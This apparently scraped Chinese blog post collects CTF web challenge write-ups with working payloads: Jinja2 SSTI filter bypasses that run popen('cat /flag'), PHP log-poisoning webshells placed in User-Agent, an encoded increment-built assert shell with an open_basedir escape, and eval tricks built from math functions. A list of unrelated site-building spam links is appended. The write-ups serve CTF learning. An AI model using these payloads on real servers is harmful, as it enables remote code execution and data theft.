当前位置: 首页 > news >正文

网站建设维护公司地址美发网站带手机版

网站建设维护公司地址,美发网站带手机版,免费推广有哪些,东营网站建设优选案例[GDOUCTF 2023]ez_ze 看见输入框而且有提示说是ssti注入 输入{{7*7}} 试试#xff0c;发现报错 输入{%%}发现了是jinja2模板 找到关键函数 Python SSTI利用jinja过滤器进行Bypass ph0ebuss Blog 原理见这篇文章#xff0c;这里直接给出payload {%set ninedict(aaa…[GDOUCTF 2023]ez_ze 看见输入框而且有提示说是ssti注入 输入{{7*7}} 试试发现报错 输入{%%}发现了是jinja2模板 找到关键函数 Python SSTI利用jinja过滤器进行Bypass · ph0ebuss Blog 原理见这篇文章这里直接给出payload {%set ninedict(aaaaaaaaaa)|join|count%} {%set ninedict(aaaaaaaaaa)|join|count%} {%set popdict(popa)|join%} {%set xhx(lipsum|string|list)|attr(pop)(eighteen)%} {%set kg(lipsum|string|list)|attr(pop)(nine)%} {%set globals(xhx,xhx,dict(globalsa)|join,xhx,xhx)|join%} {%set get(xhx,xhx,metiteg|reverse,xhx,xhx)|join%} {%set sso|reverse%} {%set cla(xhx,xhx,ssalc|reverse,xhx,xhx)|join%} {%set bas(xhx,xhx,esab|reverse,xhx,xhx)|join%} {%set bas(xhx,xhx,sessalcbus|reverse,xhx,xhx)|join%} {%set ponepop|reverse%} {%set flag(dict(cata)|join,kg,dict(flaga)|join)|join%} {%set readdict(reada)|join%} {%print(lipsum|attr(globals)|attr(get)(s)|attr(po)(cat /f*)|attr(read)())%}  第二种 {%set u%c%95*2%}{%print(|attr(uclassu)|attr(ubaseu)|attr(usubclassesu)()|attr(213)|attr(uinitu)|attr(uglobalsu)|attr(get)(ubuiltinsu)|attr(get)(uimportu)(os)|attr(popen)(cat /flag)|attr(read)())%}  [HNCTF 2022 WEEK2]easy_include 文件包含 过滤了很多东西基本的伪协议都用不了了这里涉及到一个没遇到过的文件包含---日志包含 日志包含漏洞-CSDN博客 日志包含漏洞属于是本地文件包含同样服务器没有很好的过滤或者是服务器配置不当导致用户进入了内网本来常规用户是访问不了这些文件的但由于发起访问请求的人是服务器本身也就导致用户任意文件读取 apache服务器日志存放文件位置/var/log/apache/access.log nginx服务器日志存放位置和/var/log/nginx/error.log 两者的回显并不相同apache会存放我们的url参数在访问时回显这使得我们可以在url后接一句话木马并执行。 看到了服务器是nginx 抓包访问 由本地日志文件可以看到nginx服务器中记录的是每次请求user-agent报文那么我们可以通过包含nginx服务器的日志文件然后在user-agent服务器中写入木马语句进行注入 ?php system(ls /); ? 找到了flag文件 ?php system(cat /ffflllaaaggg); ? 得到flag [SWPUCTF 2021 新生赛]hardrce_3 经典rce 过滤了异或取反构造这里用自增 $_[];$_$_;$_$_[!];$___$_;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$___.$__;$___.$__;$__$_;$__;$__;$__;$__;$___.$__;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$___.$__;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$___.$__;$_____;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$____.$__;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$____.$__;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$____.$__;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$____.$__;$_$$____;$___($_[_]); 固定格式构造出来的 assert($_POST[_]); 然后post传入 _phpinfo(); 使用时需要url编码. %24_%3D%5B%5D%3B%24_%3D%40%22%24_%22%3B%24_%3D%24_%5B!%3D%3D%40%5D%3B%24___%3D%24_%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24___.%3D%24__%3B%24____%3D_%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24__%3D%24_%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24__%2B%2B%3B%24____.%3D%24__%3B%24_%3D%24%24____%3B%24___(%24_%5B_%5D)%3B post传入 _phpinfo();  看到了phpinfo页面 发现system,exec,shell_exec,popen,proc_open,passthru被禁用 . 但是可以用file_put_contents(,) file_put_contents函数 第一个参数是文件名第二个参数是内容。 所以 构造: _file_put_contents(1.php,?php print_r(ini_get(open_basedir).br); mkdir(test); chdir(test); ini_set(open_basedir,..); chdir(..); chdir(..); chdir(..); ini_set(open_basedir,/); echo file_get_contents(/flag); print(1);? ); 然后访问/1.php,得到flag [CISCN 2019初赛]Love Math 代码审计 简单分析一下只有一个GET传参参数是c然后对上传的值进行黑名单检测接着给了白名单以及常用的数学函数。这个提示很明显了需要我们用函数进行转换成我们的执行命令 现在关键是 $_GET 怎么利用数学函数构造 base_convert()函数在任意进制之间转换数字hex2bin() 函数把十六进制值的字符串转换为 ASCII 字符。dechex() 函数把十进制数转换为十六进制数。 参考payload构造方法还有很多 ?c$absbase_convert(37907361743,10,36)(dechex(1598506324));$$abs{acos}($$abs{pi}) acossystem picat /flag 现在来简单解释一下payload hex2bin base_convert(37907361743,10,36) 37907361743 就是 hex2bin的36进制然后base_convert()转换成 10进制 dechex(1598506324) 其实就是 _GET 的16进制 dechex() 将10进制转化成16进制 因为 hex2bin()是将16进制转化成ASCII 但是正则不允许出现字母数字混合的字符串 所以 _GET hex2bin(5F474554) hex2bin(dechex(1598506324)) 然后黑名单里是禁用了 [ ]但是在php 中是可以用 { } 来代替 [ ] 的 那再来理解整理一下payload ?c$abs_GET;$$abs{acos}($$abs{pi})acossystempicat /flag 也就是 ?c$abs_GET;system(cat /flag) base_convert函数  ?c$absbase_convert(37907361743,10,36)(dechex(1598506324));$$abs{acos}($$abs{pi})acossystempicat /flag   得到flag [NSSRound#8 Basic]MyDoor  打开之后什么都没有用filter伪协议试一下 ?filephp://filter/convert.base64-encode/resourceindex.php 解码得到源码 ?php error_reporting(0); if (isset($_GET[N_S.S])) {     eval($_GET[N_S.S]); } if(!isset($_GET[file])) {     header(Location:/index.php?file); } else {     $file $_GET[file];     if (!preg_match(/\.\.|la|data|input|glob|global|var|dict|gopher|file|http|phar|localhost|\?|\*|\~|zip|7z|compress/is, $file)) {         include $file;     } else {         die(error.);     } } 发现可以传参N_S.S进行rce由于php的特性在后端会被规范成N_S_S。  利用PHP的字符串解析特性Bypass - FreeBuf网络安全行业门户  可以看到在php中这些符号都会被解析为_,这里N_S.S就会被解析为N_S_S,那么逐一替代发现使用[的时候产生了回显而为什么是_出现了问题可能是因为_在解析的时候有什么我不知道的变化因为上图没有显示当尝试_的语句时是直接回显foo_bar还是没有回显。 根据这个解析就可以访问phpinfo页面  得到flag ?file1N[S.Sphpinfo();  [NCTF 2018]flask真香 输入了一个不规范的 ssti注入测试结果成了 随便找一个页面然后注入发现了ssti漏洞这里边的参数是随便注入的用什么传参都可以 尝试{{.__class__}},发现有过滤 逐个尝试关键字发现其过滤了这些 class mro subclasses builtins eval import open os 使用字符串拼接的方法来绕过。  {{()[__class__].__base__[__subclasses__]()}}  查找os._wrap_close其他模块也可以这个模块比较常用。 一个不需要写脚本就可以知道os.wrap.close是第几个的小技巧 找到这模块之后选择前面一个的 (大于号) 然后ctrlF 输入回车 得到位置是175 最后的payload {{[__class__].__base__[__subclasses__]()[174].__init__.__globals__[popen](cat /Th1s_is__F1114g).read()}}} class os._wrap_close是Python中的一个类对象的表示形式。在这种情况下它表示os._wrap_close类的对象。 os._wrap_close类是Python内置模块os中定义的一个内部类。它用于包装文件对象的关闭操作并提供了一个可用于关闭底层文件描述符的方法。 尽管类存在于Python的标准库中但它被认为是一个内部类并不是公共API的一部分。 得到flag
http://www.dnsts.com.cn/news/29797.html

相关文章:

  • 有专业做网站的学校吗小程序企业网站
  • 哪个公司做网站便宜浏览器网址导航
  • 汝州市建设局网站长链接变短链接在线生成
  • 经营范围里的网站建设WordPress京东淘宝主题
  • 如何选择家居网站建设小企业做网站怎么做
  • 做网站开票内容是什么株洲网站建设报价方案
  • 网站开通支付宝支付自己建设公司网站
  • 北京高端企业网站建设汕头网站外包
  • 网站建设厦门同安wordpress安卓手机版
  • 珠海集团网站建设外包标准件做啥网站
  • 长沙做官方网站泉州手机网站建设公司哪家好
  • 服装网站建设项目规划书平面广告创意作品
  • 做网站有前途上海中学地址
  • 毕业设计代做网站都可信么装修设计图网站
  • 高密做网站的代理山东住房建设厅官网站
  • 如何将网站转成小程序现代感网站
  • 做视频教育网站建站软件排名
  • seo点评类网站燕郊网站建设哪家好
  • 电商网站建设意义ai做网站 如何切图
  • 海南营销型网站建设关于网站建设的合同
  • 网站建设主要工作由哪些正能量成年入口
  • 廊坊企业网站排名优化帮别人做网站用织梦模板行吗
  • 班服定制网站基本型电子商务网站
  • 石家庄开发网站陶瓷网站源码
  • 百度云怎么做网站辽宁省住房建设厅网站
  • 赣州市网站建设公司著名logo设计案例
  • 如何做建材网站的线下推广怎么做动漫原创视频网站
  • 长沙电子商务网站建设下面什么不是用于制作网页的软件
  • 静态页面做网站wordpress 登陆重定向
  • 东莞做网站排名wordpress注册用户上传权限